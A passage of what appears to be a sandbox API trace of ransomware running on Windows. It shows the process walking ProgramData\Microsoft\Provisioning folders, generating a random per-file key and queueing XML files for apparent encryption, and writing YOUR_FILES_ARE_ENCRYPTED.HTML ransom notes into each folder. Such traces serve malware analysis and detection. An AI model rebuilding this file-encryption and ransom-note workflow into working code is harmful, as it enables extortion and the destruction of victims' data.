pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml") returned 100 [0107.000] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.000] lstrlenW (lpString=".xml") returned 4 [0107.000] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.000] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.000] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.001] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0107.001] CloseHandle (hObject=0x31c) returned 1 [0107.001] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0107.001] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.001] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov") returned 85 [0107.001] GetProcessHeap () returned 0x600000 [0107.001] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0107.001] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov" [0107.002] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*" [0107.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626838 [0107.002] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0107.002] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0107.003] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.003] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime") returned 93 [0107.003] GetProcessHeap () returned 0x600000 [0107.003] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.004] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime" [0107.004] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*" [0107.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x626978 [0107.004] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0107.004] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1bae, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0107.004] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.004] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0107.004] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.004] lstrlenW (lpString=".provxml") returned 8 [0107.004] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.004] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1bae, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0 [0107.004] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0107.004] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0107.004] GetProcessHeap () returned 0x600000 [0107.004] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0107.005] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.005] WriteFile (in: hFile=0x314, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.006] CloseHandle (hObject=0x314) returned 1 [0107.006] GetProcessHeap () returned 0x600000 [0107.006] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0107.006] GetProcessHeap () returned 0x600000 [0107.006] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.007] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0107.007] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.008] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml") returned 97 [0107.008] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.008] lstrlenW (lpString=".xml") returned 4 [0107.008] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.008] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.008] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0107.008] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=348) returned 1 [0107.008] CloseHandle (hObject=0x314) returned 1 [0107.008] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0107.008] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0107.009] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0107.009] GetProcessHeap () returned 0x600000 [0107.009] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0107.009] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.009] WriteFile (in: hFile=0x31c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.010] CloseHandle (hObject=0x31c) returned 1 [0107.011] GetProcessHeap () returned 0x600000 [0107.011] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0107.011] GetProcessHeap () returned 0x600000 [0107.011] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0107.012] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0107.012] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.012] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0107.012] GetProcessHeap () returned 0x600000 [0107.012] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.013] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.026] CloseHandle (hObject=0x308) returned 1 [0107.026] GetProcessHeap () returned 0x600000 [0107.026] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.027] GetProcessHeap () returned 0x600000 [0107.027] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.028] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", cAlternateFileName="{9DF6A~1")) returned 1 [0107.028] StrStrIW (lpFirst="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.028] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}") returned 80 [0107.028] GetProcessHeap () returned 0x600000 [0107.028] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.029] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}" [0107.029] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*" [0107.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.030] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0107.031] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xd1c, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0107.031] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.031] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml") returned 99 [0107.031] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.031] lstrlenW (lpString=".xml") returned 4 [0107.031] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.031] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.031] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.031] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=3356) returned 1 [0107.031] GetProcessHeap () returned 0x600000 [0107.031] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0107.033] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="A2") returned 2 [0107.034] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="0E") returned 2 [0107.034] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="1B") returned 2 [0107.034] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="14") returned 2 [0107.034] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="E1") returned 2 [0107.034] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="AA") returned 2 [0107.034] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="84") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="C1") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="0D") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="F5") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="70") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="3F") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="EB") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="5B") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="DB") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="11") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="46") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="18") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="58") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="19") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="BB") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="B9") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="13") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="2D") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="10") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="94") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="90") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="FA") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="AB") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="16") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="8A") returned 2 [0107.034] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="7C") returned 2 [0107.035] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" [0107.035] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.035] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0107.035] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa134b56b, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa134b56b, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa134b56b, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0107.035] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.035] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: 